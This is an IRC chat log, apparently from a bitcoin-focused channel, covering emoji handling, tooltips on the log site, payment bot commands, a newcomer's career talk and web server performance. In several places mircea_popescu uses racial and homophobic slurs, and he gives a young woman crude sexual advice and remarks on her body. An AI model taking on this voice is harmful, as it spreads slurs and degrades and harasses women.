1795224;1523325603;phf;👩🏾‍⚖️ 1795225;1523325637;mircea_popescu;is this a lizard re female mediocrity ? 1795226;1523325707;phf;https://unicode.org/Public/emoji/11.0/emoji-test.txt all kinds of stuff in there 1795227;1523325738;mircea_popescu;this thing is so fucking stupid... 1795228;1523325741;phf;merperson: dark skin tone, man fairy: light skin tone 1795229;1523325778;mircea_popescu;phf could we maintain explicit lists of permitted unicrap, such as arabic and chinese ? and rape the rest ? 1795230;1523325801;mircea_popescu;half my googling today has been "wtf did she just say to me ?" 1795231;1523325855;phf;i think i'm going to add a replacement engine instead, where various words get replaced with emoji 1795232;1523325916;phf;modern btcbase 1795233;1523325921;mircea_popescu;is phf gonna be "black-and-blue corpse" ? 1795234;1523325960;phf;"right-facing fist: medium-dark skin tone" 1795235;1523325977;mircea_popescu;face-facing fist more like it. 1795236;1523325989;mircea_popescu;who the fuck told these idiots fists have faces anyway. 1795237;1523326119;mircea_popescu;where the fuck is the "queer" modifier anyway. you can say "nigger washingmachine judge" but you can't say "faggot judge" ? what's this, fellow traveller disenfranchisement ? 1795238;1523326134;phf;jeez i don't even know how to work with this soup in sbcl, that woman judge entry translates to, i shit you not, the following sequence of sbcl character names: ("WOMAN" "U1F3FE" "ZERO_WIDTH_JOINER" "SCALES" "VARIATION_SELECTOR-16") 1795239;1523326159;mircea_popescu;uifefe, plain enough. what is the problem you encounter ? 1795240;1523326165;mircea_popescu;don't tell me you're not fluent in swahili. 1795241;1523326218;phf;swahili is out, it's wakandan these days 1795242;1523326254;mircea_popescu;a right. 1795243;1523326285;phf;i like the subgroup animal reptile, "turtle, snake, dragon, t-rex" 1795244;1523326300;mircea_popescu;i can not even. 1795245;1523326378;phf;there's probably enough stuff there to make a very dull roguelike though. 1795246;1523326407;mircea_popescu;and spend the rest of your life dealing with obscure samsung driver errors. 1795247;1523326411;mircea_popescu;!!up sarah443 1795248;1523326411;deedbot;sarah443 voiced for 30 minutes. 1795249;1523326535;mircea_popescu;anyway, i thought dragons were palmipedes. hence drake. wtf "reptile". 1795250;1523326656;phf;no see you don't understand taxonomy, it is also green 1795251;1523326692;mircea_popescu;jesus christ you're probably right. 1795252;1523326904;mircea_popescu;phf here's a perhaps useful summa of all this : add the name as a tooltip ? so if i hover it shows it, and if it's useless well, so be it. 1795253;1523327021;mircea_popescu;trilema does this for footnotes by setting the "title" attribute on a tag, but i imagine same can be done with a div ? 1795254;1523327150;phf;hmm, interesting, i could put a title where everything above a ascii is decomposed into names 1795255;1523327178;mircea_popescu;something like that. 1795256;1523327189;mircea_popescu;trinque http://p.bvulpes.com/pastes/nzpL2/?raw=true 1795257;1523327196;phf;not sure how annoying that's going to make hovering though 1795258;1523327238;mircea_popescu;no idea ; also not clear if it's actually worth phf time. 1795259;1523327311;phf;i'm mostly afraid of having to download any more unicode information into my brain 1795260;1523327322;mircea_popescu;i can see it. 1795261;1523327338;mircea_popescu;in any case it was nice having someone to complain to. shit gets infuriating. 1795262;1523327371;phf;the infamous spitoon 1795263;1523327458;sarah443;https://usercontent.irccloud-cdn.com/file/XR63u7yy/image.jpg 1795264;1523327468;sarah443;https://usercontent.irccloud-cdn.com/file/fg198Xxa/2nd.jpg 1795265;1523327495;sarah443;Sorry I did it on paper and ckang had me redo it and my pen didnt want to write on skin too easily 1795266;1523327519;mircea_popescu;lipstick! 1795267;1523327535;sarah443;Is that bad? :x 1795268;1523327544;mircea_popescu;!!pay sarah443 0.02 1795269;1523327549;deedbot;Get your OTP: http://p.bvulpes.com/pastes/yHogQ/?raw=true 1795270;1523327557;mircea_popescu;so what do you do other than writing on your chest, sarah443 ? 1795271;1523327588;sarah443;Take care of my child currently. 1795272;1523327604;sarah443;Im at a point I need to decided, school or _____ 1795273;1523327610;mircea_popescu;is it foon ? 1795274;1523327616;sarah443;decide* 1795275;1523327632;sarah443;heh foon = fun ? 1795276;1523327641;mircea_popescu;yeah 1795277;1523327654;sarah443;Boring would be a better term lol 1795278;1523327668;sarah443;But I love him and he would be in daycare otherwise 1795279;1523327684;mircea_popescu;how old are you, if i may be so bold ? 1795280;1523327697;sarah443;24 1795281;1523327715;mircea_popescu;well... school kinda costs serious dough don't it ? 1795282;1523327715;sarah443;You? 1795283;1523327725;mircea_popescu;i'm 37, i'm not old. 1795284;1523327763;sarah443;It does, but my problem is, I don't want to commit to something since I can't think of anything that I can see myself doing forever. 1795285;1523327774;sarah443;If that makes sense. 1795286;1523327781;mircea_popescu;that's one way of looking at it. 1795287;1523327811;sarah443;Ive just never done something I have been super passionate about. 1795288;1523327831;mircea_popescu;well... why not ? 1795289;1523327838;sarah443;Its always out of necessity. 1795290;1523327875;sarah443;When you have to keep a baby fed and the lights on, it limits things a bit. 1795291;1523327888;mircea_popescu;i guess it must. 1795292;1523327967;ckang;I kind of wanted to do investigative stuff online, like the catch a predator style shows. 1795293;1523327993;ckang;Deep dives into odd fields 1795294;1523328034;mircea_popescu;that whole jerry springer stuff is not very enjoyable from what i hear. 1795295;1523328043;phf;check dat shit out, however on http://btcbase.org/log/2018-04-10#1795208 http://btcbase.org/log/2018-04-10#1795224 http://btcbase.org/log/2015-02-22#1028604 and http://btcbase.org/log/2015-02-22#1028606 1795296;1523328043;a111;Logged on 2018-04-10 01:52 sarah443: 👍 1795297;1523328043;a111;Logged on 2018-04-10 02:00 phf: 👩🏾‍⚖️ 1795298;1523328043;a111;Logged on 2015-02-22 06:28 asciilifeform: комсомольская правда! 1795299;1523328043;a111;Logged on 2015-02-22 06:29 asciilifeform: ☭☭☭☭☭☭☭☭☭☭☭☭☭☭☭☭☭☭☭ 1795300;1523328054;phf;*hover 1795301;1523328067;ckang;mircea_popescu: I was thinking more deep web 1795302;1523328088;mircea_popescu;phf pretty good neh ? 1795303;1523328091;ckang;Not really love drama 1795304;1523328135;mircea_popescu;ckang hey, if you ever find anything interesting i'm all ears. 1795305;1523328152;phf;yeah i like it, 9 lines of code 1795306;1523328156;ckang;As far as hidden sites go? 1795307;1523328156;mircea_popescu;splendid. 1795308;1523328177;mircea_popescu;ckang the republic's always looking for folk that aren't out and out imbeciles. 1795309;1523328211;mircea_popescu;iirc douchebag ended up here as a result of danielpbarron saying something in some what was it, free radio movement chat ? 1795310;1523328247;ckang;!!up sarah443 1795311;1523328247;deedbot;sarah443 voiced for 30 minutes. 1795312;1523328268;sarah443;ty ;) 1795313;1523328314;sarah443;ckang is always finding some nasty snuff sites and linking them 1795314;1523328338;mircea_popescu;!#s from:mircea "tumblr" 1795315;1523328338;a111;2417 results for "from:mircea \"tumblr\"", http://btcbase.org/log-search?q=from%3Amircea%20%22tumblr%22 1795316;1523328349;sarah443;I would like to do more like offensive sort of research 1795317;1523328373;mircea_popescu;sarah443 how's offensive research go ? 1795318;1523328385;ckang;yea the child predator stuff is kind of odd IMO 1795319;1523328395;ckang;since it seems like they sorta bait people 1795320;1523328416;ckang;ive only seen a few eps though, not sure how they actually do it 1795321;1523328451;sarah443;They actually use bots to troll people into talking with them and chat analysis 1795322;1523328484;mircea_popescu;ckang structure determines content and all that. once you try to go in the "i can't believe" bla bla format, you'll be producing the repsective content. 1795323;1523328487;sarah443;mircea_popescu: I guess a more proactive approach, most stuff is counter active, post mortems 1795324;1523328504;sarah443;If that makes sense? 1795325;1523328513;mircea_popescu;not exactly. got an example ? 1795326;1523328549;sarah443;Well say a site is hacked, the group leaves their tag somewhere. 1795327;1523328555;mircea_popescu;not usually. 1795328;1523328572;sarah443;I want to be in these groups, not as law enforcement. 1795329;1523328596;sarah443;but more so boots on the ground for the industry 1795330;1523328614;sarah443;Whichever it may be, counterfieting stuff has always seemed interesting 1795331;1523328630;sarah443;China is incredible at some of the stuff they do with that 1795332;1523328641;ckang;lol, I got a chinese knife 1795333;1523328642;mircea_popescu;umh. counterfeiting as in, pucci bags and whatnot ? 1795334;1523328652;ckang;it was 1/10th the price of the original 1795335;1523328662;ckang;same materials, box, etc 1795336;1523328676;mircea_popescu;http://btcbase.org/log/2017-07-13#1682707 1795337;1523328676;a111;Logged on 2017-07-13 18:42 mircea_popescu: asciilifeform incidentally : the pineapple hacking device is this chinese blade i bought on a lark. turns out it's the best steel i own / have seen in a long while. 1795338;1523328680;mircea_popescu;they improved significantly. 1795339;1523328689;ckang;having owned the fake & original you could barely tell the difference 1795340;1523328712;ckang;the good mfgs will use D2 steel and such 1795341;1523328727;ckang;but yea agreed most stuff is 100% garbage 1795342;1523328789;sarah443;There are whole portions of the internet that are pretty much China only. ecommerce wise. 1795343;1523328823;mircea_popescu;sarah443 ok, and it's a living, tenuous and marginal as it may be, buy shit in china resell it in the states. but how's this relate to website defacing ? 1795344;1523328851;ckang;the lengths they go through to counterfeit is pretty wild 1795345;1523328883;sarah443;mircea_popescu: It depends on the attack 1795346;1523328895;sarah443;Remember back during the anon/lulzsec days? 1795347;1523328902;mircea_popescu;yes ? 1795348;1523328913;sarah443;That was all about being vocal, "we did it, so what?" 1795349;1523328923;mircea_popescu;mmm 1795350;1523328949;mircea_popescu;this is a very... perception-driven approach to the events. 1795351;1523328951;sarah443;The social justice hackers, that was a bad example 1795352;1523328999;sarah443;But I don't want to just look over past things and try to figure things out, I want to be there before anything happens 1795353;1523329018;mircea_popescu;well, are you familiar with computer arcana ? 1795354;1523329033;sarah443;Just for a journalistic point, I can't work for law enforcement 1795355;1523329058;sarah443;Im not, arcana is like magic? 1795356;1523329094;mircea_popescu;well, technically arcana denotes finnicky, complicated and not directly obvious points. 1795357;1523329114;mircea_popescu;anyway, if you don't understand computers, how would you "be there" "before anything happens" ? 1795358;1523329118;sarah443;I was thinking arcane :) 1795359;1523329133;mircea_popescu;sure, arcana is the noun of arcane. 1795360;1523329160;sarah443;Well theres movements taking place that eventually will become bigger deals 1795361;1523329183;mircea_popescu;or become nothing at all. 1795362;1523329185;sarah443;In the political communities 1795363;1523329202;mircea_popescu;but do you then have a journalistic platform, like, working relationships with many/most publishers ? 1795364;1523329214;sarah443;You have 2 extremes 1795365;1523329217;mircea_popescu;yes. 1795366;1523329232;mircea_popescu;i'm an extremist after all. gotta keep up the standards. 1795367;1523329274;sarah443;Working with publishers, but I was thinking about maybe doing web editorials. I like the quick turn around time on that media and distribution 1795368;1523329293;sarah443;like Motherboard puts out some interesting reads sometimes 1795369;1523329306;mircea_popescu;it doesn't help your cause that online media is just about dead. 1795370;1523329337;sarah443;The entire darknet market thing was something I really wanted to delv into 1795371;1523329358;sarah443;Super interesting but its being forced further underground 1795372;1523329364;lobbes;not much there, I reckon. usg honeypots 1795373;1523329393;sarah443;Some of the research they did on them was pretty interesting, like quality of drugs for example 1795374;1523329407;sarah443;Was typically way better 1795375;1523329410;mircea_popescu;nobody's forcing anything anywhere ; the "darknet" bla bla is "being forced underground" in the exact sense the previous emo generation was "being forced into the closet". 1795376;1523329432;sarah443;Well, its more so the government cracking down and people get spooked I suppose 1795377;1523329453;sarah443;I folllow deepdotweb on twitter and they have some good articles sometimes 1795378;1523329461;mircea_popescu;spooked my foot, when we looked through the smoldering pile left after that idiot ross, it came to light ~nobody was using rsa. 1795379;1523329528;sarah443;Yeah amazing how others repeat the mistakes the previous iteration. 1795380;1523329543;sarah443;Its almost like planning the perfect murder lol 1795381;1523329558;sarah443;You see those shows and think, "oh, I wouldnt screw that up" 1795382;1523329574;mircea_popescu;eh. the quality of police work has so terribly degraded in the past half century, if anyone does ANY PLANNING AT ALL it's a murder that'll never get solved. 1795383;1523329581;mircea_popescu;half the ones with 0 planning also make the cut. 1795384;1523329599;sarah443;The police are a joke, if you have ever seen that show 'First 48' 1795385;1523329619;sarah443;Its pretty obvious how little they know but try to make people think they do. 1795386;1523329640;mircea_popescu;i don't really watch tv. 1795387;1523329664;sarah443;Same, don't have cable anymore, got to the point where I didn't even use it. 1795388;1523329664;mircea_popescu;but i do get court report summaries and all sorts of other things. 1795389;1523329711;sarah443;I love PACER 1795390;1523329727;sarah443;Can get lost for hours looking through stuff sometimes. 1795391;1523329743;mircea_popescu;so why not make a blog, publish summaries ? 1795392;1523329777;sarah443;I follow little niche stories and try to keep the respective communities up to date on the happenings. 1795393;1523329823;sarah443;They dont see the mainstream media or any other outlet so they would go undocumented otherwise 1795394;1523329826;mircea_popescu;yes, but your problem is that if you don't build either your skill or your platform, you will get absolutely nowhere. 1795395;1523329896;sarah443;My skills are more in sleuthing than writing 1795396;1523329898;mircea_popescu;there's a fundamental difference between "i am sarah and i have a kid to feed" and "i am sarah, and i can put your words before 1mn social media nobodies" or "i'm publish weekly in every porn mag there is" or whatever. 1795397;1523329956;sarah443;Yea that would be a good gig, writing interesting short but digestible articles. 1795398;1523329963;mircea_popescu;sarah443 that's unfortunate, very bright minds were on the record complainign there's no good market for sleuthing for fundamental reasons. like http://btcbase.org/log/2015-08-13#1237185 1795399;1523329963;a111;Logged on 2015-08-13 16:38 asciilifeform: the point i was trying to make is that: i hypothesize that the '0day market' consists very largely of folks who are sitting on 0day and not 'marketing' at all 1795400;1523329964;danielpbarron;http://btcbase.org/log/2018-04-10#1795309 << l0de radio hour, i called in and donated 0.054 via deedbot which was 800 USD at the time, which has become a sort of meme on his show now 1795401;1523329964;a111;Logged on 2018-04-10 02:43 mircea_popescu: iirc douchebag ended up here as a result of danielpbarron saying something in some what was it, free radio movement chat ? 1795402;1523329972;sarah443;Im pretty ADD 1795403;1523329979;mircea_popescu;i did not necessarily agree with him, but that dun make his words go away 1795404;1523329997;mircea_popescu;danielpbarron a right, i recall now. 1795405;1523330002;mircea_popescu;pretty cool huh. 1795406;1523330017;sarah443;The 0day market is very interesting too 1795407;1523330046;sarah443;I wish I had a company paying me to buy that stuff for research, that would be a fun job :) 1795408;1523330051;lobbes;sarah443, have you checked out Qntra, btw? you may enjoy 1795409;1523330059;lobbes;!!up sarah443 1795410;1523330059;deedbot;sarah443 voiced for 30 minutes. 1795411;1523330084;danielpbarron;the mtw guy who handled the money for him is currently in huge legal trouble, something about stealing millions of USD from dell computers i think 1795412;1523330087;mircea_popescu;"i wish there were someone paying for what i want to do" is a terrible way to waste a life. 1795413;1523330088;sarah443;I haven't, what is it? Googling now, on phone 1795414;1523330102;mircea_popescu;danielpbarron o.O link or something ? 1795415;1523330179;mircea_popescu;sarah443 qntra.net 1795416;1523330203;sarah443;I like the twitter feed 1795417;1523330218;mircea_popescu;qntra has a twitter feed ?! 1795418;1523330224;sarah443;The content I mean, its interesting 1795419;1523330238;sarah443;Oh, was that a different qntra? 1795420;1523330271;sarah443;https://twitter.com/qntra 1795421;1523330282;mircea_popescu;holy shit look at that. wtf, twitter's going to the dogs, they've not banned BingoBoingo ?! 1795422;1523330294;lobbes;oh hey, I think that was shinohai >> http://btcbase.org/log/2016-09-08#1536724 1795423;1523330294;a111;Logged on 2016-09-08 00:54 shinohai: Also fixed Qntra bot on twitter until next time it breaks 1795424;1523330304;mircea_popescu;ah! 1795425;1523330319;mircea_popescu;iiincredibru 1795426;1523330392;sarah443;I like twitters delivery, short blips + pic/video 1795427;1523330393;mircea_popescu;BingoBoingo "This leaves the question who ha a motive very open." << This leaves the question of who had a motive very open. 1795428;1523330400;sarah443;I hate the site and interface though 1795429;1523330435;danielpbarron;mircea_popescu, https://www.delawareonline.com/story/news/2018/01/30/delaware-hacker-indicted-multimillion-dollar-fraud-scheme/1076443001/ 1795430;1523330499;mircea_popescu;dark web. pastebin plox ? 1795431;1523330595;sarah443;Wow, that guy was part of this chat? 1795432;1523330603;mircea_popescu;!#s from:MTW 1795433;1523330603;a111;26 results for "from:MTW", http://btcbase.org/log-search?q=from%3AMTW 1795434;1523330617;sarah443;Oh lol, hes here now 1795435;1523330632;mircea_popescu;!!up MTW 1795436;1523330632;deedbot;MTW voiced for 30 minutes. 1795437;1523330645;mircea_popescu;yo MTW! 1795438;1523330646;mircea_popescu;lol 1795439;1523330666;sarah443;He must be doing okay if hes out. 1795440;1523330698;phf;that's a right and proper bouncer, if you can do 10 years or whatever, come out, and get your logs out of it 1795441;1523330715;mircea_popescu;mirccloud ? 1795442;1523330736;phf;hehe 1795443;1523330771;mircea_popescu;anyway, it all revolves on whether they can steal the money back or not. if they can't, they're on their knees begging. with some limited negotiation ability can get to keep a third or so and walk. 1795444;1523330783;mircea_popescu;if they can steal it back however, you're fucked. 1795445;1523330804;sarah443;Yeah, crimes of this nature they want restitution not jail. 1795446;1523330834;sarah443;Spend X a year keeping someone locked up, or bleed them dry of everything they own... 1795447;1523330842;mircea_popescu;brings us right back to http://trilema.com/2017/the-universal-plan-for-wealth/ 1795448;1523330849;sarah443;Gov loves the later, sometimes both 1795449;1523330892;danielpbarron;maybe these work: http://archive.is/hIwqY aaand the first one dun wanna archive so .. http://wotpaste.cascadianhacker.com/pastes/IwVY2/?raw=true 1795450;1523330899;sarah443;Whats your opinion on universal basic income? (UBI) 1795451;1523330915;mircea_popescu;ty danielpbarron 1795452;1523330921;mircea_popescu;sarah443 terrible. 1795453;1523330927;trinque;ah man, dark web and UBI 1795454;1523330953;sarah443;Its incredible the range of answers I get on that ;) 1795455;1523330965;lobbes;btw phf I'm digging the unicode hovers in btcbase 1795456;1523330978;trinque;sarah443: you should just go strip in the valley, marry some startup cuck, end up with half his shares in nothing. ah nevermind. 1795457;1523331014;mircea_popescu;that's a point. where do you live sarah443 ? 1795458;1523331016;trinque;mircea_popescu: ack on msg 1795459;1523331023;sarah443;Lol, at my age I wouldnt be a hot commodity. 1795460;1523331036;sarah443;Way more/willing 18 year olds 1795461;1523331037;phf;sarah443: you haven't been in the valley have you 1795462;1523331043;mircea_popescu;you would be, yes. ever read the camwhore article ? 1795463;1523331045;sarah443;mircea_popescu: Florida 1795464;1523331109;sarah443;Most of my friends in Cali are trying to leave though so that should tell me something 1795465;1523331112;mircea_popescu;it's not a bad plan, go to SF for a week, join all the events, from bdsm munches to apple hackathon day, and just doe eye one or two dweebs per. then suck cock like your life depends on it, and then get married. 1795466;1523331118;phf;lobbes: ty, i'm messing with it, i added proper romanization for cyrillic, since it comes up so much. e.g. комсомольская правда! becomes "komsomol'skaja pravda!" 1795467;1523331128;mircea_popescu;sarah443 it should tell you this : they're idiots. gotta do the work. 1795468;1523331135;sarah443;Haha :) Ive done that for free 1795469;1523331157;mircea_popescu;sarah443 yes, but you did it stupidly. as marylin points out : it tastes the same when it comes out of a multi-mn cock. 1795470;1523331164;sarah443;Guess im the idiot 1795471;1523331193;trinque;I'm just saying, similar word salad seems to have swallowed Framedragger whole 1795472;1523331197;mircea_popescu;the key elements are a) high net worth dweebs, not the sorta guys you meet at raves and b) utter abjection, none of that "i'm a person and i have rights" bullcrap. 1795473;1523331198;trinque;arguably bright dood, even 1795474;1523331203;mircea_popescu;the time for that is in divorce court. 1795475;1523331224;sarah443;mircea_popescu: a lot of them, are hard to 'bond' with 1795476;1523331233;sarah443;Very shelled/walled off 1795477;1523331238;mircea_popescu;everyone's easy to bond with if you don't think you're about anything else than bonding. 1795478;1523331260;mircea_popescu;that's how puppies got so popular. 1795479;1523331286;sarah443;Yeah, some chemical confidence may help them too 1795480;1523331368;mircea_popescu;anyway, sure there may be one or two 16yo http://trilema.com/2013/whore-strat/ 's out there. but there's well over 100k dweebs worth over 1mn in paper. out of the money they waste on rent you can buy a farm in the transvaal and enjoy free weekly gangbangs for the rest of your life. 1795481;1523331445;mircea_popescu;"His notariety began seven years ago when he was arrested at a video game convention in Boston and accused of pirating $6 million in game code that was derived from a system used to train CIA agents for combat. May agreed to a Boston judge’s offer for pretrial probation in exchange for a dismissal of his case." << equivalency degree spelling aside, check out this guy! 1795482;1523331459;mircea_popescu;why don't people say THAT when BingoBoingo goes "who's yo daddy" ? one helluva intro. 1795483;1523331469;sarah443;Im really curious to see what comes out of the newly found crypto wealth kids 1795484;1523331488;sarah443;Every week you see a news story about that happening to some kid 1795485;1523331500;mircea_popescu;lol. 1795486;1523331510;sarah443;Potential is there to do great or horrible things 1795487;1523331511;mircea_popescu;you're seeing it, aren;t you ? 1795488;1523331518;mircea_popescu;i mean... just look at your tits. 1795489;1523331620;sarah443;Its going to be an interesting time ahead though, either way 🤘 1795490;1523331643;mircea_popescu;TOOLTIP FAIL! 1795491;1523331665;phf;bah 1795492;1523331708;sarah443;Did I do something wrong? 1795493;1523331713;mircea_popescu;nah. 1795494;1523331726;phf;parallel conversation 1795495;1523331736;mircea_popescu;DARK conversation underneath! 1795496;1523332172;ckang;wow sarah443 is still blogging, dont think ive ever seen her type so much 1795497;1523332185;ckang;!!up sarah443 1795498;1523332185;deedbot;sarah443 voiced for 30 minutes. 1795499;1523332443;trinque;mircea_popescu: http://p.bvulpes.com/pastes/JKsdX/?raw=true 1795500;1523332548;sarah443;🦄 Hey ckang was brushing my teeth about to turn in for the night. mircea_popescu great talking to you, I have more questions than answers now but it has me thinking about what I want to do a bit more 🌑 1795501;1523332579;ckang;lol sarah443 those emojiis arent something you should use on irc 1795502;1523332599;trinque;all I got are boxes over here. 1795503;1523332604;ckang;most clients dont render them right 1795504;1523332608;ckang;yea 1795505;1523332609;trinque;I"m projecting my own feelings into them 1795506;1523332615;trinque;they look the same 1795507;1523332617;phf;trinque: try hovering on that line on btcbase though! 1795508;1523332622;ckang;its a unicorn and a moon 1795509;1523332624;*;trinque looks 1795510;1523332656;ckang;i never realized how many new ones they added 1795511;1523332665;ckang;like they have 6 different skintones 1795512;1523332669;trinque;holy shit phf, it's like google translate for the kids 1795513;1523332726;phf;courtesy of extra 150mb of sbcl memory usage 1795514;1523332780;ckang;jesus its really that large? 1795515;1523332818;ckang;terminal is finally catching up, I can see them in Terminal.app, some but not the newest ones 1795516;1523332832;ckang;but it really messes up monospaced stuff 1795517;1523333074;trinque;> SIGN OF THE HORNS 1795518;1523333076;trinque;ahahaha 1795519;1523333091;ckang;mircea_popescu: how can I return this 0.02 ? 1795520;1523333097;mircea_popescu;ckang well, tell her the place's not going anywhere. 1795521;1523333103;ckang;just do another transfer or void it? 1795522;1523333104;mircea_popescu;ckang you can just !!pay mircea_popescu 0.02 1795523;1523333115;ckang;!!pay mircea_popescu 0.02 1795524;1523333122;deedbot;Get your OTP: http://p.bvulpes.com/pastes/FW3Fx/?raw=true 1795525;1523333157;ckang;!!v 5E5B679908D7B4FEB4A78A2889C88580257875B15272262A7E840FDAF539AFA9 1795526;1523333164;deedbot;ckang paid mircea_popescu 0.02 1795527;1523333217;mircea_popescu;trinque i have nfi o.O 1795528;1523333238;ckang;mircea_popescu: yea she has free time during the day and is normally wondering somewhere around the internet, new to irc though 1795529;1523333393;mircea_popescu;pretty cool this whole payments stuff huh. 1795530;1523333428;ckang;yea, wild stuff, i honestly didnt believe douchebag 1795531;1523333484;ckang;Hmmm 1795532;1523333490;ckang;TomServo sounds familiar 1795533;1523333534;mircea_popescu;!!up cassidy3 1795534;1523333534;deedbot;cassidy3 voiced for 30 minutes. 1795535;1523333538;ckang;maybe from a forum, its itching my brain 1795536;1523333542;mircea_popescu;do you know how to voice yourself cassidy3 ? 1795537;1523333591;lobbes;ckang you could say it is a -mystery- 1795538;1523333619;mircea_popescu;o lol i hadn't rated her. 1795539;1523333620;ckang;its going to bother me until I remember, I know that lol 1795540;1523333648;mircea_popescu;!!rate cassidy3 1 go-go dancer girl 1795541;1523333650;deedbot;Get your OTP: http://p.bvulpes.com/pastes/kpk5A/?raw=true 1795542;1523333683;ckang;i thought go-go dancing died with disco 1795543;1523333856;mircea_popescu;hey, if punk is alive, how could disco have died. 1795544;1523333919;ckang;i suspect they might have just renamed it to 'electronic' 1795545;1523334005;ckang;i wanted to go to ultra but stuff came up, oh well 1795546;1523334040;*;trinque is well past his psychedelics til sunrise phase 1795547;1523334095;ckang;haha, well, its more manageable with the right titration ;) 1795548;1523334239;ckang;ive never had a bad time with psychedelics+girls+music 1795549;1523334372;phf;mircea_popescu: i've loaded a newer version of unicode definitions, so now it recognizes all this new junk too 1795550;1523334441;trinque;night all. 1795551;1523334468;mod6;ni ni 1795552;1523334477;ckang;im feeling you there, got me yawning by saying that 1795553;1523334486;phf;laters 1795554;1523335225;mircea_popescu;phf how much memory is this wasting now ? 1795555;1523335324;phf;mircea_popescu: insignificant, couple of megs maybe. not anything i noticed by just looking at top's output 1795556;1523335357;mircea_popescu;ah, i thought it was 150 1795557;1523335415;phf;i was just throwing numbers around, but once i measured it 1795558;1523335419;mircea_popescu;WOMAN EMOJI MODIFIER FITZPATRICK TYPE-5 ZERO WIDTH JOINER SCALES VARIATION SELECTOR-16 << evident improvement. 1795559;1523335438;mircea_popescu;dat fitzpatrick type-5 1795560;1523335577;phf;i think we had the jokes going here at some point, of embedding a complete "princess maker" as a concatenative unicode language 1795561;1523335617;mircea_popescu;از رفته قلم هیچ دگر‌گون نشود وز خوردن غم بجز جگرخون نشود گر در همه عمر خویش خونابه خوری یک قطره از آن که هست افزون نشود 1795562;1523335648;mircea_popescu;you know this is actually pretty great. 1795563;1523335674;mircea_popescu;和我一起,那是你的婊子掴你进监狱,并与所有的民族疯人院。 1795564;1523335702;mircea_popescu;oya. kudos phf 1795565;1523335767;phf;i'm thinking i'll, if i want to do some leisure coding, extend it with a couple of language specific romanizations. russian's there, but chinese and arabic might be a good idea 1795566;1523336161;TomServo;ckang: As lobbes hinted, Mystery Science Theater 3000. A commonly ripped off name, I've discovered. http://www.yuchtar.com/Tom.jpg 1795567;1523336261;mircea_popescu;phf it's already a great help as it is, but sure. 1795568;1523336911;ckang;TomServo: ahhh okay, this one is from a forum, so probably ripped 1795569;1523337617;ckang;If you guys want to test unicode 1795570;1523337647;ckang;i have a the perfect ascii 1795571;1523337702;ckang;perfect in the sense if something handles it wrong you will know quickly 1795572;1523338631;ckang;btw mircea_popescu, what hours are you normally around here? 1795573;1523339754;mircea_popescu;i dunno, whenever i feel like it. 1795574;1523339854;mircea_popescu;why ? 1795575;1523340111;ckang;i knew another girl that was interested but she works and is in school 1795576;1523340139;ckang;but no worries ill just look if you are around and she can wait ;p 1795577;1523340155;mircea_popescu;works. 1795578;1523341287;mircea_popescu;http://www.contravex.com/2018/03/29/announcing-the-newest-bitcoin-infrastructure-node-or-why-ethereum-is-so-utterly-fucked/ < in other news. 1795579;1523342905;ben_vulpes;so here's a wonder: apache for some reason takes 2.2 seconds to serve an mp-wp file that nginx can cough up in ten ms; even though both are nominally passing the same files over to php fpm pools 1795580;1523344055;mircea_popescu;ben_vulpes https://www.jeffgeerling.com/blog/3-small-tweaks-make-apache-fly 1795581;1523344060;mircea_popescu;the devil is in the configs. 1795582;1523344171;*;ben_vulpes reads 1795583;1523344505;mircea_popescu;but anyway, nginx is not actually better ; or at least wasn't, as of http://btcbase.org/log/2016-07-18#1505137 1795584;1523344505;a111;Logged on 2016-07-18 19:33 mircea_popescu: anyway. in practice there's also nginx, which i doubt is any better ; and i don't foresee our writing of a web server right nao. 1795585;1523344517;mircea_popescu;or previous check http://btcbase.org/log/2015-04-29#1114962 1795586;1523344517;a111;Logged on 2015-04-29 00:24 mircea_popescu: apache is a piece of shiot. so is nginx. so is everytrhiong else. 1795587;1523344654;ben_vulpes;nginx is screamingly fast out of the box for this type of setup, but does not support .htaccess files which the wordpress folks tell me are very important 1795588;1523344688;ben_vulpes;this is a 100x slowdown for handing some files over to a running php setup; i gotta be doing this entirely incorrectly 1795589;1523344697;ben_vulpes;mircea_popescu: thanks for the pointer but none of that helped 1795590;1523344758;mircea_popescu;well, can't really be helped blindly, you'll have to look into its logs / status report and see wtf it's doing. 1795591;1523344897;mircea_popescu;https://www.machmetrics.com/speed-blog/average-page-load-times-websites-2018/ << in other lulz. TEN SECONDS. 1795592;1523344978;ben_vulpes;looking for how to turn performance information up now 1795593;1523345058;ben_vulpes;heh i worked in the belly of a magento thing that served in 2.3s and that was a victory 1795594;1523345107;mircea_popescu;anyway, for your peace of mind, it's definitely not apache itself. it serves trilema actually faster than nginx on internal testing, especially so under heavy load. (which there can mean > 100 req/s) 1795595;1523345173;ben_vulpes;mildly pacifying, ty 1795596;1523345187;ben_vulpes;it is within a hair of intepreted speeds; which is driving me up a wall 1795597;1523346098;ben_vulpes;mircea_popescu: how is your apache plugged into php? mod_php with graybeard grease or? 1795598;1523346253;ben_vulpes;http://p.bvulpes.com/pastes/jLBq6/?raw=true << typical; still working to increase verbosity 1795599;1523346289;ben_vulpes;but allll of the time is in the fcgi connection looks like; which makes me wonder is it buffering the entire response before then handing it off to the client, and would that even slow things down? 1795600;1523351211;ckang;you need nginx+php-fpm to yield the true benefits 1795601;1523351258;ckang;performance wise, specially with ttfb + magento 1795602;1523352212;mircea_popescu;ben_vulpes afaik ; but if you have a specific question (ie, in bash form) i can prolly answer. 1795603;1523352590;mircea_popescu;anyway, using fcgi is probably not ideal -- there's for instance a recurring 500 error / resource leak issue associated. 1795604;1523352655;mircea_popescu;anyway, that's very likely the cause of your delay. 1795605;1523352754;mircea_popescu;basically an exact rehash of http://btcbase.org/log/2017-07-02#1678490 1795606;1523352754;a111;Logged on 2017-07-02 12:50 asciilifeform: http://btcbase.org/log/2017-07-02#1678460 << how about we roll the boot time ( to shell!! ) of your cmachinekernel, how about? 1795607;1523352853;mircea_popescu;meanwhile otherplaces, "Into pregnant chicks? You've come to the right place. I'm newly single and am ready to finally really try to explore the vast world of kink." 1795608;1523352874;mircea_popescu;yeah, totally, "newly single pregnant female" is a thing. it doesn't collapse to "idiot", oh, no. 1795609;1523354568;mircea_popescu;!!up david_francois 1795610;1523354569;deedbot;david_francois voiced for 30 minutes. 1795611;1523354588;spyked;http://btcbase.org/log/2018-04-10#1795174 <-- I wrapped those into pre tags, but it seems they got parsed anyway. replacing all < with < and crossing my fingers; but if mp-wp has some other way of rendering math, lemme know. 1795612;1523354588;a111;Logged on 2018-04-10 01:31 mircea_popescu: spyked prolly it included < 1795613;1523354609;mircea_popescu;spyked iirc it barfs on << ; lt 